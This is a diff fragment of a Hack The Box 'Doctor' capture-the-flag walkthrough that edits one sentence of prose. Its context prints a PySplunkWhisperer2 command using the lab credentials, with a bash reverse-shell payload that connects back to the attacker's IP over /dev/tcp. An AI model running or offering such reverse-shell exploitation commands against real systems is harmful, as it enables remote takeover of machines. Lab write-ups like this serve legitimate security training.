KyhleOhlinger/ohlinger.co/_walkthroughs/2021-02-07-htb_doctor.markdown

 ```
 </details>

 The exploit itself looked simple enough so I decided to try it.
-The command that I used is shown below:
+The command that I used as well as the successful exploitation thereof is shown below:

 ```python
 python PySplunkWhisperer2_remote.py --lhost 10.10.14.106 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.106/1234 0>&1"'